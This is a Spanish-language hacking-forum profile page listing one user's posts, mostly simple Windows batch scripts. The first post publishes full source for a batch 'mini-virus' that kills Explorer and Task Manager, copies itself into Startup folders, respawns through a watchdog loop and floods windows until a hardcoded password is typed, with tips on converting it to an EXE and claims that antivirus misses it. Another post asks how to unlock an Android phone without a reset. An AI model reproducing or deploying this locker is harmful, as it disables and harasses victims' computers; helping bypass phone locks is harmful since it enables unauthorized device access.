elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1] 2
1  Programación / Scripting / ¿MiniVirus? en Batch en: 8 Marzo 2019, 02:14 am
Hola foro!PRIMERO QUE NADA, quiero decir que esto no es como los típicos batch que eliminan la System32 y listo, porque primero, eso lo detecta hasta el antivirus más malo, y esto al ser algo ¿nuevo? no lo detecta. Y tampoco es un tipo de esas bromas con MSGBox, esto es algo que si se pudiera trabajar más en un lenguaje más avanzado (ya que se que en batch no se pueden hacer muchas cosas) podría llegar a ser algo muy poderoso.



El script lo podes encontrar en mi GitHub y acá abajo voy a dejar el SRC también.
De paso, si quieren cambiarle el nombre al archivo, necesitan hacer varias cosas.
Una de ellas es primero que nada cambiar todo lo que diga "MCRegedits.exe" a "NombreDeTuArchivo.exe", ya que no es algo automatizado (aunque si quieren puedo crear otro batch para automatizar esto.)
Además tienen que pasar su archivo a .EXE mediante Bat2Exe (creo que es la mejor opción)
De paso, al convertirlo a Bat2Exe (obligatorio, si no no funciona "CIF") hay algunos problemas, pero no importa.

Paso a explicar mi script.
El script lo que hace es:
Al iniciarlo primero que nada cierra explorer.exe y taskmgr.exe para que no se pueda abrir casi nada, crea los archivos: CIF y MOLESTO con nombres random
Código:
SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM%
Luego empieza a pedirles que inicien sesión con una contraseña de lo contrario no van a poder cerrar el programa.
Si lo cierran, esta "CIF" que checkea todo el tiempo si MCRegedits.exe está abierto y si no lo está, lo abre.
Crea cada 4 pings al localhost otra ventana CMD la cual empieza a molestar diciendo que inicie sesión, así que si está jugando a un juego en fullscreen etc, lo va a sacar, etc...
Si escriben la contraseña incorrecta, empiezan a abrirse más screens CMD de "MOLESTO".
Y lo más importante y es en lo que me centré es que si la persona que lo abre no entiende mucho o  no tiene ni idea donde se puede esconder el programa etc, no lo va a poder eliminar. La única forma es entrando en modo seguro y eliminando MCRegedits.exe en "shell:startup" y "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" o usando un script que también cree por las dudas de que sin querer como una persona que le faltan varios jugadores lo abra (mi caso) cree un "antidoto" que elimina la mayoría de los archivos y deja la computadora utilizable.
Si no me falta alguna otra cosa de poca importancia, ahí esta lo que hace un simple batch, sin eliminar nada, molestar.



Si van a compartirlo por favor, dejen créditos con un simple link a mi perfil o una mención, me haría feliz ya que esta ***** me saco tiempo de mi vida en lo cual podría haber gastado haciendo algo más importante, jeje. De paso, para algunos que digan que se puede encontrar en otros lados y que me copio de alguien o que si hay metodos de resolución en Google etc... Chupenme bien la pija esto está hecho todo a mano sin ningún programa (excepto Bat2Exe) y lo único que saqué de Google ya que no me acordaba fue esto:
Código:
tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao
FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end
la saque de Stackoverflow donde los gringuitos comparten su info.




Código:
echo off
cls
:: EMPIEZA LA MAGIA (SCRIPTS PARA PERSISTENCIA)
SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM%
echo off
cls
echo :s >> %temp%\mss.bat >> %molestorndm%.bat
echo echo echo off >> %temp%\mss.bat >> %molestorndm%.bat
echo echo cls >> %temp%\mss.bat
echo echo echo INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat
echo echo title INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat
echo echo ping localhost -n 2 >nul >> %temp%\mss.bat >> %molestorndm%.bat
echo echo exit >> %temp%\mss.bat >> %molestorndm%.bat
echo start %temp%\mss.bat >> %molestorndm%.bat
echo ping localhost -n 4 >nul >> %molestorndm%.bat
echo goto s >> %molestorndm%.bat
start /min %temp%\%molestorndm%.bat
::::::::::::::::::::::::::::::::
:: PERSISTANCE AFTER SHUTDOWN ::
::::::::::::::::::::::::::::::::
copy MCRegedits.exe %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
copy MCRegedits.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
:::::::::
:: CIF ::
:::::::::
copy MCRegedits.exe %temp%
SET cifrandom=%random%MadeByTino%random%FF%random%FRV%random%ERVWZ%random%TYN%random%456VVV%random%ZZZEZ%random%VKJVEJJV%random%LDKIADI%random%DJDHE4H%random%3458347%random%73626%random%7235452%random%U345FCNC3%random%757HC32V23JVJ%random%U43VH23%random%
echo :cif >> %temp%\%cifrandom%.bat
echo taskkill /f /im "explorer.exe" >> %temp%\%cifrandom%.bat
echo taskkill /f /im "taskmgr.exe" >> %temp%\%cifrandom%.bat
echo echo off >> %temp%\%cifrandom%.bat
echo tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao >> %temp%\%cifrandom%.bat
echo FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end >> %temp%\%cifrandom%.bat
echo start MCRegedits.exe >> %temp%\%cifrandom%.bat
echo goto cif >> %temp%\%cifrandom%.bat
echo :end >> %temp%\%cifrandom%.bat
echo del mcregedits.lmao >> %temp%\%cifrandom%.bat
echo goto cif >> %temp%\%cifrandom%.bat
start /min %temp%\%cifrandom%.bat

:start
start /min %temp%\%cifrandom%.bat
start /min %temp%\%molestorndm%.bat
cls
color f0
echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=
echo            Al parecer necesitas iniciar sesi¢n
echo             Usa la contrase¤a que te han dado.
echo.
echo         Si reinicias la PC o cierras el programa
echo                 va a aparecer de nuevo
echo                  Script made by Tino
echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=
SET /P psw=Ingresa la contrase¤a:
IF %psw%==tino777 goto :done
) ELSE (
goto :nope

:done
cls
echo Contrase¤a correcta!
echo Felicidades.
cd %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
del MCRegedits.exe
cd %temp%
del MCRegedits.exe
cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
del MCRegedits.exe
taskkill /f /im "cmd.exe"
taskkill /f /im "MCRegedits.exe"
pause
exit

:nope
cls
echo Contrase¤a incorrecta!
echo Intentalo de nuevo
echo Mientras mas contrase¤as incorrectas, mas mensajes!
echo.
echo Presione cualquier tecla para volver al inicio
pause >nul
start %temp%\%molestorndm%.bat
goto :start
pause
2  Programación / Ingeniería Inversa / Alguna recomendación? en: 2 Octubre 2018, 16:06 pm
HOLA FORO!
Buenas! Tengo tres preguntas, soy MUY NUEVO en esto de la Ingeniería Inversa y estoy llevando por ahora el curso de karmany del 2008 por ahí, la y la verdad, no se si estaría desactualizado, o haya otros mejores?
La tercera pregunta, es si me recomendar un crackme o algo para practicar, que sea MUY fácil, ya que con suerte pase el crackme Renascense (de nivel 1) y la mayoría que hay de nivel 0-1 en la lista de los crackmes están desactualizados.

Un saludo
~ Tino.
3  Informática / Software / [APORTE] Ofuscar HTML Online (Sitio web) en: 30 Septiembre 2018, 19:30 pm
HOLA FORO!  ;-)
Les traigo un APORTE ¡Para que ofusquen sus HTML desde una página web!
La página esta moderada por mi e intento de RECOPILAR todos los ofuscadores! Para que no tengan que andar buscando en Google algunos que quizás ni siquiera sirvan.
Así que, para ayudarlos a ustedes, les traigo un ofuscador web que funciona y siempre va a estar activo hasta aproximadamente dentro de 6/7 meses, luego va a cambiar de dominio y  va a seguir activo por 1 año más!



LINK: www.pepinoarmy.win


Recalco, es una recopilación de ofuscadores, EL CÓDIGO DEL OFUSCADOR NO ES MIO, para ver el original entra en www.angelsresist.com/obfuscator.shtml
4  Programación / Scripting / [APORTE] Ofuscar un Batch ONLINE (Mediante sitio web) en: 30 Septiembre 2018, 02:48 am
HOLA FORO!  ;-) Hoy les traigo un ofuscador de batch en una página web!

Normalmente los ofuscadores de Batch son en programas que debes descargar y ejecutar, cosa que tiene un riesgo: infectar su PC de malware, además que esta forma es 100% funcional hasta la fecha y la vamos a mantener activa hasta dentro de 7 meses aproximadamente, no como otras que cierran en seguida por problemas de host!

Para usar el ofuscador no tienes que ser experto en NADA! Solamente tienes que copiar tu código  BATCH y pegarlo en la página web!
Ejemplo:


Preguntas frecuentes:

P: ¿Se puede desofuscar?
R: Si, claramente se puede desofuscar, acordémonos que es OFUSCAR, sin embargo, es un poco más difícil.
Si quieres una protección la cual sea imposible de copiar y pegar el código, te recomendamos ofuscar el batch y luego usar BatToExe para ofuscarlo más, y luego encriptarlo.
P: ¿Vas a agregar un desofuscador?
R: Probablemente sí, estoy intentando codear un desofuscador en JS, ya que el desofuscador que tengo, está escrito en Batch.
P: ¿Vas a agregar otros lenguajes?
R: Probablemente sí.


LINK: http://www.pepinoarmy.win
Hosted @ 000webhost

MOD: Imagen adaptada a lo permitido.
5  Programación / Scripting / [APORTE] Licenciar un BATCH! en: 29 Septiembre 2018, 21:04 pm
HOLA FORO!  ;-)Esta vez, luego de 1 año de inactividad, les traigo un aporte por el cual le podrán poner una licencia a sus BATCHS

Cómo funcina? El Batch busca una STRING (la cual es la licencia) en un archivo llamado "psw.BatchLicense" (el cual lo tienes que descargar desde el link de abajo), y si la encuentra, lo deja seguir con el código
¿Es seguro? Casi que no, ya que es público, y no esta casi ofuscado.
La licencia que se le da a los programas con BatchLicense es la misma para TODOS los otros BATCHS! Si necesitas una licencia única, envíame un mensaje privado.

ESTE CÓDIGO DE ABAJO NO ES EL CÓDIGO ORIGINAL, ES UN EJEMPLO:
Código:
findstr /I "random" psw.BatchLicense
if %errorlevel%==0 (
goto startbatch
(
:startbatch
cls
rem // EL CÓDIGO DE TU BATCH VA AQUÍ ABAJO
echo Hola ElHacker!
pause >nul
 

⬆⬆ ESE CÓDIGO NO ES EL ORIGINAL ⬆⬆: Con ese código no puedes hacer NADA, ya que no tienes el archivo psw.BatchLicense y si lo tuvieras, tendrías que escribirle: "random"

⭐Así que, dejando eso en claro, aquí va el link/url de descarga:
⭐MediaFire: http://www.mediafire.com/file/1erivn7dww8fcaj/
⭐ZippyShare: https://www56.zippyshare.com/v/jyr2fiTI/file.html
⭐zUpload: https://zupload.me/eb2e9cf4908363f5

⭐ La descarga incluye: Código de BatchLic (en .cmd), psw.BatchLicense e instrucciones
⭐ Descomprime con WinRAR: https://www.winrar.es/descargas
6  Seguridad Informática / Bugs y Exploits / [DUDA] Eliminar el patrón de un celular sin HARDRESET en: 26 Noviembre 2017, 14:18 pm
Hola comunidad de ElHacker
Hoy tengo una duda :huh:, la cual es: como sacarle el patrón, pin o contraseña de un celular sin hacer HardReset

El OS es Android y es un Samsung Galaxy J1 o J5 no me acuerdo muy bien.
Se podrá hacerlo de alguna forma por PC entrando por cable?

Gracias!
7  Programación / Scripting / [BATCH] Generador de números aleatorios/random en: 26 Noviembre 2017, 14:00 pm
Hola comunidad de ElHacker  ;-)Tengo un código básico, que me gustaría compartirlo por si quieren sacar ideas.
El batch lo único que hace es un loop que genera más de 200 números aleatorios en milisegundos.

Pero se le puede editar para darle una función tipo generadores de contraseñas, etc


Código
  1. @echo off
  2. cls
  3. title ! ElHacker.net !
  4. color f4
  5. :loop
  6. echo %RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%%RANDOM%
  7. goto loop


~ Saludos, Tino.
8  Programación / Scripting / [APORTE] Login en batch. en: 4 Octubre 2016, 20:14 pm
Hola ElHacker  :rolleyes:

Tengo un aporte para ustedes, por si quieren hacer un ""programa"" con Logins



Son unos scripts bastante largos y me costaron un par de horas...  ::)

Yo soy nuevo en esto así que hay unos fallos, pero son pocos!

Fallos:
1- Se cierra al terminar de registrarse (Se tiene que volver a abrir, PERO, se queda todo registrado en la Database del CMD)

2- No se si existe este error (en el code) pero por las dudas hice un redirect a RegisterFailed por si existen contraseñas con caracteres especiales (Como pueden ser &, el espacio, *, [, ], etc..)

He testeado el código varias veces y no he encontrado ningún error (Además de esos 2)

Sin mas que decir, les dejo el code!  ;-)


Código:
@echo off
color f0
SET programname=Login
:logincode
cls
title %programname% by TinoCode

::::::::::::::::::::MODE
::::: El MODE se puede borrar, ya que es opcional
mode con cols=155 lines=50

:::::::...CODE
find /c "Password: " %temp%\registers.tinolog
if %errorlevel% equ 1 goto register
goto login






:register
cls
echo.
echo No tienes cuenta!
echo Create una!
echo.
echo Usuario:
SET /P user=
echo Usuario: %user% >> %temp%\registers.tinolog
cls
echo.
echo No tienes cuenta!
echo Create una!
echo.
echo Contrasena:
SET /P pass=
echo Password: %pass% >> %temp%\registers.tinolog
goto successreg_quest




:successreq_quest
find /c "Password: " %temp%\registers.tinolog
if %errorlevel% equ 1 goto regfailed
goto successregister





:successregister
cls
echo.
echo Registrado correctamente.
echo Ahora te puedes loguear!
echo.
echo Presiona cualquier tecla para irte a loguear
pause >nul
goto logincode





:regfailed
cls
title TinoCode > chars.report
echo.
echo %programname% no ha podido procesar tu registro
echo y ha fallado.
echo Intenta eliminar todos los caracteres (Excepto: A-Z, 0-9)
echo de tu usuario y contrasena
echo.
echo Guardando Crashreport
ping localhost -n 3 >nul
echo [Register Error 02] %programname% >> chars.report
echo.
pause
goto logincode


:login
cls
echo.
echo Logueate!
echo.
echo Ingresa tu usuario:
SET /P userlogin=
find /c "Usuario: %userlogin%" %temp%\registers.tinolog
if %errorlevel% equ 1 goto loginfailed
goto password

:password
cls
echo.
echo Logueate!
echo.
echo Ingresa tu contrasena:
SET /P passwordlogin=
find /c "Password: %passwordlogin%" %temp%\registers.tinolog
if %errorlevel% equ 1 goto loginfailed
goto loggedin



:loginfailed
cls
echo Usuario o contrasena incorrecta...
echo.
echo Volviendo a LOGIN_09 en 5 segundos
sleep 5
goto login






:loggedin
cls
echo.
echo Logueado correctamente.
pause >nul
goto logincode
9  Programación / Ingeniería Inversa / CrackMe Muy fácil en: 24 Septiembre 2016, 23:35 pm
Hola ElHacker!

Hoy tengo este "aporte" en el cual pueden demostrar sus habilidades extremas de crackeo de Payp.. digo Batch..



Descarga (Directa): http://download1334.mediafire.com/g17elrpzwgqg/b62ydf328l8u6ro/CrackMe+muy+facil.exe


Descarga (Manual): http://www.mediafire.com/download/b62ydf328l8u6ro/CrackMe+muy+facil.exe
10  Programación / Scripting / [BATCH] If TEXT exist... en: 24 Septiembre 2016, 19:49 pm
Hola!

Hoy pregunto si es posible hacer que un Batch detecte si un .txt contiene determinado %texto%

Ej:

Digamos que la contraseña es HOLA (Caso sensitivo)




[  Ingrese contraseña: HOLA

Batch procesando si es correcta...

por lo tanto el Batch tendría que llevar al usuario a :ContrasenaIncorrecta porque la contraseña es incorrecta

y si es correcta tendría que llevar al usuario a :ContrasenaCorrecta   ]



Muchas gracias por leer mi post :)
Espero que me puedan ayudar, no se me ocurre ningún tipo de código para esto y he buscado en Google y no encuentro nada sobre eso, quizás es que he buscado mal


Mi historial (De busquedas en google por ahora)



Si %texto% existe entonces batch - Buscar con Google
www.google.com.uy



Si %texto% existe entonces - Buscar con Google
www.google.com.uy




Si la linea existe es correcta entonces batch - Buscar con Google
www.google.com.uy


Si %texto% es correcto entonces Batch - Buscar con Google
www.google.com.uy



No encuentro nada :/
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines